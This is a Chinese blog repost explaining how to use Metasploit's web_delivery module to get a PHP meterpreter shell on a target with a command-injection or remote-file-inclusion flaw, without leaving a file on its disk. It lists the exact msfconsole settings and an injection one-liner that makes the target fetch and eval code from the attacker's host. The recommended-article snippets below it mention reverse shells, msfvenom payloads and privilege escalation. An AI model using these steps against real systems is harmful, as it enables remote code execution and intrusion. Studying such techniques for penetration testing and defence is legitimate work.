msf中exploit的web_delivery模块

最新推荐文章于 2023-05-15 20:24:50 发布
最新推荐文章于 2023-05-15 20:24:50 发布
阅读量290 收藏 1
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/baihualin/p/10509948.html
版权

 

背景:目标设备存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,但不想在目标设备硬盘上留下任何webshell文件信息

 

解决思路:让目标设备从远端服务器加载webshell代码至内存执行

错误尝试:远端服务器开启web服务,让目标设备来调取。(错误点:默认情况下目标设备来调取的时候其实是将webshell在远端服务器执行,并不是将文件加载至自己内存执行)

正确方法与工具:使用msf中exploit的web_delivery模块。此模块支持在本地监听一个端口,别人一旦访问该端口就会将该端口内的文件读取至本地执行(把webshell放在该端口下刚刚好)。

具体使用步骤:

1、use exploit/multi/script/web_delivery

2、set target PHP   ====>因为一般web平台默认支持PHP,所以我们选择兼容性最好的PHP做webshell

3、set payload php/meterpreter/reverse_tcp    ====>选择php写的meterpreter

4、set lhost 172.20.163.160

5、set lport 1111

6、run

 

运行成功后显示(只需让目标设备在系统命令下执行标红部分命令就可得到对方shell):

 

利用方式:

1、命令注入漏洞:

在注入点注入:  php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.20.163.160:1111/OgsOFaj3yKH'));"

2、远程文件包含漏洞:

在包含漏洞处包含: http://172.20.163.160:1111/OgsOFaj3yKH

转载于:https://www.cnblogs.com/baihualin/p/10509948.html

weixin_30300523
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf5 自动攻击模块 db_autopwn
07-10
`db_autopwn`是Metasploit Framework(msf5)的一个核心功能模块,它允许渗透测试者进行自动化漏洞利用,大大提高了效率。这个模块在安全审计和渗透测试过程扮演着重要角色,因为它能够快速扫描并尝试攻击目标...
msfuse.rar_image fusion
07-15
本案例,我们关注的是"msfuse.rar"这个压缩包,其包含了关于"panchromatic"(全色)和"multispectral"(多光谱)图像融合的内容。下面我们将详细讨论这两个概念以及相关的图像融合技术。 全色图像,通常具有较...
metasploit之webdelivery
Yale的博客
01-31 1260
介绍下webdelivery模块 先是启动metasploit 接下来选择我们使用的模块 Show options看看我们需要设置哪些参数 我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看 2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,...
msf web_delivery模块攻击
dichengpai8268的博客
05-03 386
目标机:win7 ip:192.168.31.136 攻击机:kai liunx ip:192.168.31.54 一.使用web_delivery模块的regsvr32_applocker_bypass_server 1.打开神器metasploit,终端输入msfconsole 2.搜索we...
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2577
一条命令上线MSF(Metasploit)-web_delivery模块
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 643
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
msf web_delivery模块攻击实战操作
欢迎来到神林的博客
04-14 2667
1.打开神器metasploit,终端输入msfconsole(我建议直接图形界面单击打开,方便啊)2.搜索web_delivery模块:search web_delivery3.使用命令:use exploit/multi/script/web_delivery4.设置攻击机Ip:set lhost (这里是你自己的ip)5.运行,exploit,生成:payload:   python -c ...
MSF Toolkit_zip_
10-03
这个ZIP文件很可能是包含了MSF的各种工具和模块,方便用户在不同的环境快速部署。 【描述】"rastat toolkits for voice implementing" 暗示了这个MSF工具包可能特别关注语音通信或VoIP(Voice over Internet ...
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
在标签,"cmmb_msf"、"generic_play"、"cmmb_play"和"mfs_player"都直接指向了这个软件的核心功能。"cmmb_msf"表明软件与CMMB和MFS格式紧密相关;"generic_play"和"cmmb_play"指出了它作为一个通用的CMMB播放工具...
MSFweb_delivery模块使用测试(Linux)
beefreesky的博客
12-29 230
linux环境下,MSF web_delivery模块使用测试。
MSFweb_delivery模块使用测试(Windows)
beefreesky的博客
12-29 272
Windows环境下,MSF web_delivery模块使用测试
DMZ下使用web_delivery 介绍
每天多一分钟学习,生命就多一份精彩
06-08 1322
From : http://evi1cg.me/archives/Use_Web_delivery_Under_DMZ.html?utm_source=tuicool&utm_medium=referral 之前碰到的问题,自己的主机做了DMZ,设置[b]web_delivery[/b]时,发现将lhost设置成外网ip,则脚本不能运行,如果设置成内网ip,则反弹payload反弹的
(记录向)使用MSFweb_delivery模块上线
daxi0ng的博客
11-30 1422
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
渗透测试-window反弹shell
lza20001103的博客
05-11 4526
window反弹shell
内网渗透之Linux反弹shell(三)
墨鱼菜鸡
09-10 232
目录 Linux反弹shell(三) 环境 05.3Python 06.1PHP 06.2PHP 07Ruby 08.1Telnet 08.2Telnet 09OpenSSL Linux反弹shell(三) 环境 kali 192.168.0.100 ubuntu ...
windows提权的几种姿势
weixin_44300286的博客
09-07 4301
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2035
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
Empire安装,基本介绍,命令使用,监听(一)
single_g_l的博客
03-12 4737
目录 一.​Empire介绍 二. 安装Empire 1.命令安装 2.Git安装 3.Docker安装 三. 基本使用 1. Empire拥有客户端和服务端 2. 客户端操作 1) 基础命令 2)监听器 四. Empire 基础详解(模块,命令) 1.empire 相关命令 2. interact 命令 3. uselistener 监听模块 4. usestager模块(payload) 5. usemodule privesc 提权模块 6.PowerBr...
msfexploit是什么意思
最新发布
06-07
在Metasploit Framework (Msf) ,"exploit" 是一个关键的概念,它指的是攻击利用或漏洞利用模块Msf是一个流行的开源渗透测试工具,用于黑客和安全研究人员进行安全评估。当提到exploit时,它涉及到以下几个方面: 1. **漏洞利用**:exploit模块是针对已知软件漏洞的代码,黑客可以使用这些模块尝试在目标系统上执行恶意操作,如获取权限、安装后门等。 2. **payloads**:exploit通常与payloads(有效载荷)结合使用,payload是攻击成功后在目标机器上执行的可执行代码,可能包括木马、shellcode或其他恶意代码。 3. ** exploitation chain**:exploit和payload作为链条的一部分,黑客通过识别和利用某个漏洞,然后将payload注入到系统,形成完整的攻击链。 4. **手动或自动化**:Msfexploit模块既有手动模式,用户可以选择适当的选项进行手动操作,也有自动化模式,可以根据配置自动执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值